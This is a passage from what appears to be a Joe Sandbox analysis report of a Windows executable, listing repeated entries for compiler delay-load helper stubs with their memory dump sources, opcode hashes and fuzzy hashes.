                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 11e7c1e98eefbae33161ab9e36a388e07dd9e6b02e3134174e79558abde0ebed
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F41D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 9a786da7d7d9e0330bc76491aefd5a5a6ce4cd6b70c994744cecae9995bdb403
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 9a786da7d7d9e0330bc76491aefd5a5a6ce4cd6b70c994744cecae9995bdb403
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F409 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 882d0016ff87cf4700a6539dbf2ba99d9e42d952d8b2139d36b5d1b4115d05bf
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 882d0016ff87cf4700a6539dbf2ba99d9e42d952d8b2139d36b5d1b4115d05bf
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F431 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 6dd4fb30c2fbe0be29d4f12b030cef129f8a54ce9e94c637df0bfb042892be54
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 6dd4fb30c2fbe0be29d4f12b030cef129f8a54ce9e94c637df0bfb042892be54
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F427 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 74c4889c0e084fb37bbcddfd9d659c8256e0755ecbf142eafa61dbb52d3e28b0
                                                                              • Instruction ID: 151086aa82a5111e8fb74d986dac6c02ed2f86f9acd256d792b3bda1709955fa
                                                                              • Opcode Fuzzy Hash: 74c4889c0e084fb37bbcddfd9d659c8256e0755ecbf142eafa61dbb52d3e28b0
                                                                              • Instruction Fuzzy Hash: 2DA002955691077D355553516D17D3A161DC4D4B51734452EF841C405194405D495531
                                                                              Function 00D3F596 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: ab6b9ede4bc94d8cba0103773ecf8ee55a3f611e80eceed6c85b0e300243f9c8
                                                                              • Instruction ID: 0a85baf66ddcc3c5cdfaec06e6c26438fa4ecd2851e87aee099dcba0cae9201f
                                                                              • Opcode Fuzzy Hash: ab6b9ede4bc94d8cba0103773ecf8ee55a3f611e80eceed6c85b0e300243f9c8
                                                                              • Instruction Fuzzy Hash: 18A011C2AE800ABE32082320BC03E3A020CC0C8BA2B30883AF882C0080A8808C082030
                                                                              Function 00D3F58C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 4d6f61accb4b9a42bc0195a25dbf917cd0e0242c6f9996647b6b7e62b99069ef
                                                                              • Instruction ID: 0a85baf66ddcc3c5cdfaec06e6c26438fa4ecd2851e87aee099dcba0cae9201f
                                                                              • Opcode Fuzzy Hash: 4d6f61accb4b9a42bc0195a25dbf917cd0e0242c6f9996647b6b7e62b99069ef
                                                                              • Instruction Fuzzy Hash: 18A011C2AE800ABE32082320BC03E3A020CC0C8BA2B30883AF882C0080A8808C082030
                                                                              Function 00D3F5A0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 4d5d1cd8753f8518ecbbc30b4cb9949b46d64749a2ef83967bbf9c52aed6f7ce
                                                                              • Instruction ID: 0a85baf66ddcc3c5cdfaec06e6c26438fa4ecd2851e87aee099dcba0cae9201f
                                                                              • Opcode Fuzzy Hash: 4d5d1cd8753f8518ecbbc30b4cb9949b46d64749a2ef83967bbf9c52aed6f7ce
                                                                              • Instruction Fuzzy Hash: 18A011C2AE800ABE32082320BC03E3A020CC0C8BA2B30883AF882C0080A8808C082030
                                                                              Function 00D3F549 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 6ba9a69d6b9736b58ef950df77a521707c7d66365c38218426775be86b7ce30c
                                                                              • Instruction ID: e6787d500398f43bc7d4420e4fb2495e109a7d17f4d891e75e41179997a6f75f
                                                                              • Opcode Fuzzy Hash: 6ba9a69d6b9736b58ef950df77a521707c7d66365c38218426775be86b7ce30c
                                                                              • Instruction Fuzzy Hash: 88A011C2AE80083E32082B20BE03E3A020EC0C0B22B30803AF880C0080A8808E082030
                                                                              Function 00D3F564 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 29bf91c4c58ceb88c6eef04d5a76feadaa09da24b3e8876f2784906ec8eed6a4
                                                                              • Instruction ID: 0a85baf66ddcc3c5cdfaec06e6c26438fa4ecd2851e87aee099dcba0cae9201f
                                                                              • Opcode Fuzzy Hash: 29bf91c4c58ceb88c6eef04d5a76feadaa09da24b3e8876f2784906ec8eed6a4
                                                                              • Instruction Fuzzy Hash: 18A011C2AE800ABE32082320BC03E3A020CC0C8BA2B30883AF882C0080A8808C082030
                                                                              Function 00D3F56E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 42380b61a9e0bebec35db56e2d2b367625016ef40f80f523480b63a439ad2718
                                                                              • Instruction ID: 0a85baf66ddcc3c5cdfaec06e6c26438fa4ecd2851e87aee099dcba0cae9201f
                                                                              • Opcode Fuzzy Hash: 42380b61a9e0bebec35db56e2d2b367625016ef40f80f523480b63a439ad2718
                                                                              • Instruction Fuzzy Hash: 18A011C2AE800ABE32082320BC03E3A020CC0C8BA2B30883AF882C0080A8808C082030
                                                                              Function 00D3F6D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F6AB
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 207cb7d870beb368ee9c10abfe77fff5fcdeaa419218f0711b1c333992dda7d7
                                                                              • Instruction ID: d2bcf2310d99ec6dc88b2af3ae1c2a26655f1c6a5fa038ad159e3aff0856a101
                                                                              • Opcode Fuzzy Hash: 207cb7d870beb368ee9c10abfe77fff5fcdeaa419218f0711b1c333992dda7d7
                                                                              • Instruction Fuzzy Hash: A0A011C2AB800ABC3A0823202C03E3A020CC0C8B22B308A3AFC82C0080A8800C080A30
                                                                              Function 00D3F6CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F6AB
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 2779990794d37d9a6932be59ba34bdf22fdbab2768d8f6b2a94a786339f46639
                                                                              • Instruction ID: d2bcf2310d99ec6dc88b2af3ae1c2a26655f1c6a5fa038ad159e3aff0856a101
                                                                              • Opcode Fuzzy Hash: 2779990794d37d9a6932be59ba34bdf22fdbab2768d8f6b2a94a786339f46639
                                                                              • Instruction Fuzzy Hash: A0A011C2AB800ABC3A0823202C03E3A020CC0C8B22B308A3AFC82C0080A8800C080A30
                                                                              Function 00D3F6F5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F6AB
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: e6d29ae518465ea6a715b47fa6391c1b8cdc60b6bbba1ba23fcdbf6ff0583431
                                                                              • Instruction ID: d2bcf2310d99ec6dc88b2af3ae1c2a26655f1c6a5fa038ad159e3aff0856a101
                                                                              • Opcode Fuzzy Hash: e6d29ae518465ea6a715b47fa6391c1b8cdc60b6bbba1ba23fcdbf6ff0583431
                                                                              • Instruction Fuzzy Hash: A0A011C2AB800ABC3A0823202C03E3A020CC0C8B22B308A3AFC82C0080A8800C080A30
                                                                              Function 00D3F6FF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F70C
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
